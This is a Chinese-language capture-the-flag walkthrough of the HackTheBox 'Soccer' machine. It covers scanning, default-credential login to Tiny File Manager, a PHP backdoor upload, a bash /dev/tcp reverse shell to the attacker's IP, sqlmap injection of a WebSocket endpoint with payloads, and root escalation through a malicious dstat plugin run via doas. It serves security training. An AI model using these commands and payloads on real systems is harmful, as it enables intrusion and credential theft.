Soccer-htb-writeup

0x00 靶场技能介绍

章节技能：目录扫描、Tiny File Manager默认口令、Tiny File Manager任意文件上传、进程分析与DNS绑定、Websocket SQL注入、suid提权、doas提权

参考链接：https://0xdf.gitlab.io/2023/06/10/htb-soccer.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.194

2、获取下开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.194 -oG allports -Pn
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 07:11 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.194
Host is up (7.8s latency).
Not shown: 53470 filtered tcp ports (no-response), 12063 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 76.17 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 --min-rate=10000 10.10.11.194 -Pn -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 07:13 CST
Nmap scan report for 10.10.11.194
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_  256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds

3、那就绑定下发现的域名地址吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.194 soccer.htb" | sudo tee -a /etc/hosts
10.10.11.194 soccer.htb

4、使用whatweb识别一下网站服务，并查看下网站页面吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ whatweb http://soccer.htb/
http://soccer.htb/ [200 OK] Bootstrap[4.1.1], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.194], JQuery[3.2.1,3.6.0], Script, Title[Soccer - Index], X-UA-Compatible[IE=edge], nginx[1.18.0] 

http://soccer.htb/

5、并没有什么大的发现，那就扫一下目录吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://soccer.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://soccer.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 450ms]
#                       [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 453ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 528ms]
#                       [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 565ms]
#                       [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 569ms]
# directory-list-2.3-small.txt [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 631ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 672ms]
# Copyright 2007 James Fisher [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 620ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 660ms]
# on at least 3 different hosts [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 664ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 711ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 721ms]
#                       [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 476ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 510ms]
tiny                    [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 863ms]
                        [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 357ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

6、发现了一个目录地址，查看下这个页面

http://soccer.htb/tiny/

view-source:http://soccer.htb/tiny/

data-version="2.4.3"

7、通过查看页面源码，发现了这个CMS的版本号，下面开始搜集这个CMS的漏洞

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit Tiny File Manager                                    
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabi | php/webapps/36364.txt
Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulne | php/webapps/36365.txt
MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload                                                         | php/webapps/15768.txt
Tiny File Manager 2.4.6 - Remote Code Execution (RCE)                                                                    | php/webapps/50828.sh
TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload                                                                      | php/webapps/15194.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -x 50828         
  Exploit: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/50828
     Path: /usr/share/exploitdb/exploits/php/webapps/50828.sh
    Codes: CVE-2021-45010, CVE-2021-40964
 Verified: False
File Type: Unicode text, UTF-8 text
                                                                                                                                   
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 50828
  Exploit: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/50828
     Path: /usr/share/exploitdb/exploits/php/webapps/50828.sh
    Codes: CVE-2021-45010, CVE-2021-40964
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/50828.sh

8、通过EXP发现了默认的账号密码信息，登录后，根据EXP的内容，我们可以上传木马文件

admin admin@123
http://soccer.htb/tiny/tinyfilemanager.php?p=
https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/

http://soccer.htb/tiny/uploads/qsd-php-backdoor.php?f=/var/www/html//tiny/tinyfilemanager.php

    'admin' => '$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW', //admin@123
    'user' => '$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' //12345

9、这里需要注意的是，这里是用的异步的js进行自动上传的，所以得等系统加载完js才行，要不然上传不上去文件，这里会定期清理目录，所以需要及时把我们的shell运行上去。

http://soccer.htb/tiny/uploads/qsd-php-backdoor.php

bash -c "bash -i >& /dev/tcp/10.10.16.7/443 0>&1"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.194] 45436
bash: cannot set terminal process group (1051): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$ 

www-data@soccer:~/html/tiny/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@soccer:~/html/tiny/uploads$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root   root   4096 Nov 17  2022 .
drwxr-xr-x 21 root   root   4096 Dec  1  2022 ..
drwxr-xr-x  3 player player 4096 Nov 28  2022 player
www-data@soccer:~/html/tiny/uploads$ 

10、到目前位置，就获取到了一个初始的shell，下面开始常规的信息收集

www-data@soccer:/home/player$ ss -ltn
ss -ltn
State   Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  Process  
LISTEN  0        151            127.0.0.1:3306           0.0.0.0:*              
LISTEN  0        511              0.0.0.0:80             0.0.0.0:*              
LISTEN  0        4096       127.0.0.53%lo:53             0.0.0.0:*              
LISTEN  0        128              0.0.0.0:22             0.0.0.0:*              
LISTEN  0        511            127.0.0.1:3000           0.0.0.0:*              
LISTEN  0        511              0.0.0.0:9091           0.0.0.0:*              
LISTEN  0        70             127.0.0.1:33060          0.0.0.0:*              
LISTEN  0        511                 [::]:80                [::]:*              
LISTEN  0        128                 [::]:22                [::]:* 



Hostname, hosts and DNS


127.0.0.1       localhost       soccer  soccer.htb      soc-player.soccer.htb

127.0.1.1       ubuntu-focal    ubuntu-focal


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                              
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                                                                          
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1111/nginx: worker  
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      1111/nginx: worker  
tcp6       0      0 :::22                   :::*                    LISTEN      -    

11、在枚举中，发现系统还有一个子域名的系统，我们绑定下并访问这个地址

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.194 soc-player.soccer.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.194 soc-player.soccer.htb

http://soc-player.soccer.htb/

drwxr-xr-x 2 root root 4096 Dec  1  2022 /etc/nginx/sites-enabled                                                                                          
drwxr-xr-x 2 root root 4096 Dec  1  2022 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 41 Nov 17  2022 /etc/nginx/sites-enabled/soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
server {
        listen 80;
        listen [::]:80;
        server_name soc-player.soccer.htb;
        root /root/app/views;
        location / {
                proxy_pass http://localhost:3000;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;
                proxy_set_header Connection 'upgrade';
                proxy_set_header Host $host;
                proxy_cache_bypass $http_upgrade;
        }
}

12、免费门票当你注册/登录

http://soc-player.soccer.htb/signup

shiyan@qq.com
shiyan
shiyan

http://soc-player.soccer.htb/check

http://soc-player.soccer.htb/match

13、我们在登录进去的页面上的源码里发现了一些信息

view-source:http://soc-player.soccer.htb/check

ws://soc-player.soccer.htb:9091

14、到这里多条件分析，发现这里应该就是Websocket的应用接口，下面使用python的三方库验证下

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m websockets ws://soc-player.soccer.htb:9091/
Connected to ws://soc-player.soccer.htb:9091/.
> help
< Ticket Doesn't Exist
> {"id":"1"}
< Ticket Doesn't Exist
> {"id":"58040"}
< Ticket Doesn't Exist
> eit
< Ticket Doesn't Exist
> exit
< Ticket Doesn't Exist
> exit()
< Ticket Doesn't Exist
Connection closed: 1000 (OK).

15、sqlmap 可以直接针对 Websocket，因此可以成为从易受攻击的端点转储信息的简单方法。尝试尝试不同的–level和–risk标志。

https://cloud.tencent.com/developer/article/1867137

┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3


sqlmap identified the following injection point(s) with a total of 394 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"id":"-4486 OR 5386=5386"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"id":"1 AND (SELECT 3020 FROM (SELECT(SLEEP(5)))XyhF)"}
---
[07:25:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 --dbs

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" --tables

Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" -T "accounts" --columns

Database: soccer_db
Table: accounts
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | varchar(40) |
| id       | int         |
| password | varchar(40) |
| username | varchar(40) |
+----------+-------------+


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" -T "accounts" -C email,username,password --dump

Database: soccer_db
Table: accounts
[1 entry]
+-------------------+----------+----------------------+
| email             | username | password             |
+-------------------+----------+----------------------+
| player@player.htb | player   | PlayerOftheMatch2022 |
+-------------------+----------+----------------------+

16、到这里就获取到了一个用户的账号密码了，开始尝试登录

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh player@10.10.11.194
The authenticity of host '10.10.11.194 (10.10.11.194)' can't be established.
ED25519 key fingerprint is SHA256:PxRZkGxbqpmtATcgie2b7E8Sj3pw1L5jMEqe77Ob3FE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.194' (ED25519) to the list of known hosts.
player@10.10.11.194's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Apr 20 16:04:43 UTC 2024

  System load:  0.0               Processes:             230
  Usage of /:   70.2% of 3.84GB   Users logged in:       0
  Memory usage: 25%               IPv4 address for eth0: 10.10.11.194
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19
player@soccer:~$ is
is: command not found
player@soccer:~$ id&hostname&ifconfig
[1] 22638
[2] 22639
soccer
uid=1001(player) gid=1001(player) groups=1001(player)
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.194  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:e2cc  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:e2:cc  txqueuelen 1000  (Ethernet)                                                                                                                             
        RX packets 81324  bytes 13228566 (13.2 MB)                                                                                                                                       
        RX errors 0  dropped 0  overruns 0  frame 0                                                                                                                                      
        TX packets 82457  bytes 31239694 (31.2 MB)                                                                                                                                       
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0                                                                                                                       
                                                                                                                                                                                         
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536                                                                                                                                             
        inet 127.0.0.1  netmask 255.0.0.0                                                                                                                                                
        inet6 ::1  prefixlen 128  scopeid 0x10<host>                                                                                                                                     
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 476010  bytes 55321617 (55.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 476010  bytes 55321617 (55.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[1]-  Done                    id
[2]+  Done                    hostname
player@soccer:~$ 

17、那就获取下第一个flag信息吧

player@soccer:~$ ls -la
total 28
drwxr-xr-x 3 player player 4096 Nov 28  2022 .
drwxr-xr-x 3 root   root   4096 Nov 17  2022 ..
lrwxrwxrwx 1 root   root      9 Nov 17  2022 .bash_history -> /dev/null
-rw-r--r-- 1 player player  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25  2020 .bashrc
drwx------ 2 player player 4096 Nov 17  2022 .cache
-rw-r--r-- 1 player player  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 Nov 17  2022 .viminfo -> /dev/null
-rw-r----- 1 root   player   33 Apr 20 13:46 user.txt
player@soccer:~$ cat user.txt
e5f77482f14275f0275ba9294d82bfe4
player@soccer:~$ 

0x02 系统权限获取

18、开始枚举可以提权的内容

player@soccer:~$ sudo -l
[sudo] password for player: 
Sorry, user player may not run sudo on localhost.
player@soccer:~$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
player@soccer:~$ 

player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17  2022 /usr/local/bin/doas
player@soccer:~$ 

19、doas是 OpenBSD 操作系统上常见的替代方案sudo，但可以安装在基于 Debian 的 Linux 操作系统（如 Ubuntu）上。doas.conf我在 中没有看到文件/etc，因此我将使用以下命令在文件系统中搜索它find：

player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17  2022 /usr/local/bin/doas
player@soccer:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:~$ 

20、dstat是一个获取系统信息的工具。查看手册页，有一个关于插件的部分说：

player@soccer:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_shiyan.py
player@soccer:~$ doas /usr/bin/dstat --shiyan
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
root@soccer:/home/player# id
uid=0(root) gid=0(root) groups=0(root)
root@soccer:/home/player#

21、那获取下最终的flag信息吧

root@soccer:/home/player# cat /root/root.txt
6f5e6092991692e12338d2858bfb1d24
root@soccer:/home/player# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/519